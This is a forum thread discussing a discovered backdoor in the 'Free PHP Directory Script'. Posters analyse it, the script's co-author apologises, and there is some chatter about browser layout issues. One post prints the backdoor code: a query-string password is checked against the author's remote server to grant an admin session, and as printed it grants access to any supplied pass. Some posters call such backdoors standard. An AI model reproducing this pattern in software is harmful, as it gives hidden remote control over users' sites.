Backdoor in 'Free PHP Directory Script' ?

[freekrai]

just wanted to interject here for a sec.
I've been a PHP developer for a long time and I can understand the wanting to track where your software is installed, and tracking for valid licenses.

With my free stuff, I just use a blank image usually to tell me where it's installed, but with my commercial software, I sometimes generate a key for the web site where it's gonna be installed and when the software checks that key with the site it's installed on, it gets to decide on whether it's licensed to be there or not. Unlicensed software will email me to say that the script's been installed someplace where it shouldn't be.

I've never needed backdoors but I know people who use them. In fact, you'd be surpised how many scripts use backdoors or license tracking.

[I, Brian]

Quote:

Originally Posted by stoner3221

I paid what I considered big bucks for a script that had very poor cross browser compatibility and have spent over a $1,000 dollars to make it so and it’s still not right.

I'm curious by what you mean that it has compatability. Seems to work fine in IE and Firefox, which is possibly 99% of users.

[John Scott]

Some people are saying he gets people's passwords, but he denies that. Which is it?

[Jazzee]

Quote:

Originally Posted by I, Brian

I'm curious by what you mean that it has compatability. Seems to work fine in IE and Firefox, which is possibly 99% of users.

I think he may be talking about the issue with the doctype being wrong on some of the pages, which causes problems on those pages in firefox.

[MarketingLady]

Quote:

Some people are saying he gets people's passwords, but he denies that. Which is it?

Take a look at the free version you could download: include.php, line 60, the scroll to the right and analyze the code ;-)

Perhaps he made some changes now, after this thread;

Greets

[realestate]

How much would a programmer charge if he created a directory program just for me with same features (no need for backup, downloadablity.., everything to be done manually).

Why not create a phpbb forum, do a good modrewrite, remove header and footer. i guess the result would almost be the same.

[stoner3221]

Quote:

Originally Posted by I, Brian

I'm curious by what you mean that it has compatability. Seems to work fine in IE and Firefox, which is possibly 99% of users.

I tried it myself in Firefox last week, it was viewable but the formatting was all off, probably not noticeable to most users. I used to get a major amount of complaints but have most of the issues resolved except firefox. I Hope!

[awall19]

Quote:

Originally Posted by realestate

How much would a programmer charge if he created a directory program just for me with same features (no need for backup, downloadablity.., everything to be done manually).

depends on the programmer, their skill, their cost of living, and what they think they are worth

[John_Loch]

Hi folks.

Looks like the script has been modified, and the back door removed.

Initial risks were:
1. Author could access via remote auth (true state from remote script would setup admin session)
2. Install called gifs from server for installation tracking << this may still be present, but it's not a risk.

PS: It should be noted that the script was never set up to capture passwords. ONLY in the event that a specific arg was passed (via URL) would the script query his server (ie he had to have configured his script to return 'true' in response to the query.)

Anyhow, my point is, if the crap has been removed, then the script can be used - and to be honest it's a damn good one. The catch 22 was, you couldn't remove the back door because it would contravene the licensing agreement (ie no code mods). I must say I encountered a few annoyed WM's who weren't trying to abuse anything - instead, they felt abused (viewed the nondisclosure as deliberate deception by omission.)

Anyhow, the script is looking good. If I needed one, I'd prolly use it myself.

Cheers,

JL.

[I, Brian]

Quote:

Originally Posted by stoner3221

I tried it myself in Firefox last week, it was viewable but the formatting was all off, probably not noticeable to most users. I used to get a major amount of complaints but have most of the issues resolved except firefox. I Hope!

Do you mean the way that IE shows the categories different to Firefox?

If so I wouldn't at all have regarded it as a big issue. (shrugs)

Is Doctype the source of this, then?

[freekrai]

I noticed when I downloaded his most recent update yesterday that it had been removed.
At the same time, looking at an earlier version that I had, you can see that he doesn't get your password, he sends it a password that checks to see if it's the same one he has on his server and if it is then it lets him access the admin panel:

Code:

if ($pass) { 
	$access = fopen ("http://www.directory-search.org/include_variables.php?p=$pass","r"); 
	$access = fread($access,4); 
	if ($access == "true"){ 
		session_start(); 
		$HTTP_SESSION_VARS['admin'] = true; 
		header("Location: {$dir}admin_edit.php"); 
	}; 
	$access = "true";
	if ($access == "true"){ 
		session_start(); 
		$HTTP_SESSION_VARS['admin'] = true; 
		header("Location: {$dir}admin_edit.php"); 
	}
};

There is no grabbing of your password and firing it off to their web server for record keeping.

Pretty standard back door actually, most back doors have a hidden key that a programmer can use. It's what they were built for, now some use them for license tracking.

Just he made his more noticable.

[stoner3221]

Quote:

Originally Posted by I, Brian

Do you mean the way that IE shows the categories different to Firefox?

If so I wouldn't at all have regarded it as a big issue. (shrugs)

Is Doctype the source of this, then?

It’s not high on my priority list but to me it is still an issue since it looks very bad in Firefox in my opinion. At one time it was barley viewable in Firefox but thanks to some wonderful help from here was corrected.

[biz-directory]

Hello,

I am Javier GarcÃ*a, co-owner of Biz-Directory.org and programmer of the Free PHP Directory Script. Let me explain the things people are talking about.

First of all, we have removed the code the article talks about, we prefer not to have anoyed customers though we have to bear abuses from other people.

The invisible image was just that, an image, unable to hurt in any way. It allowed us to keep the records of installed scripts. It was more convenient than requesting the installation url every time the script was downloaded/installed.

Regarding the backdoor, it was password-protected, so it is impossible nobody but us can access the script, not even people with access to the script code. We added this feature several months after the first distribution of the script. We had several problems with abusive users, not only removing copyright links but also reselling the script, besides other aggressive actions. So we decided to include this tool. We have only used it once, and its use was more than justified. As the full script is distributed after the purchase, and there is no risk, it does not include this code.

Something people is wrong about: the backdoor was not sending any personal data, of course not the password, nor other user information. The only parameter sent was the "pass" variable, not used in the script (not even in the installation, in addition the installation does not include "include.php" but "include_install.php"). It was the variable we should type in the querystring to enter the panel. Any programmer can tell this looking at the code.

Maybe including this code was not a lucky idea, but our intention was not to retrieve personal information. Just to allow us an entrance in case of abuse.
We are sorry about any inconvenience this could have caused, but we can assure no legal user of the script has anything to be afraid.

Regards

Javier GarcÃ*a
Biz Directory

[John Scott]

Welcome to the forum, Javier.

[samer]

welcome, and thanks for the clear explanation

[I, Brian]

Having already paid for a $50 licence, and about to buy a $700 licence, I'm pretty fine with it all. (Shrugs.)

[samer]

yes, one of the best scripts ..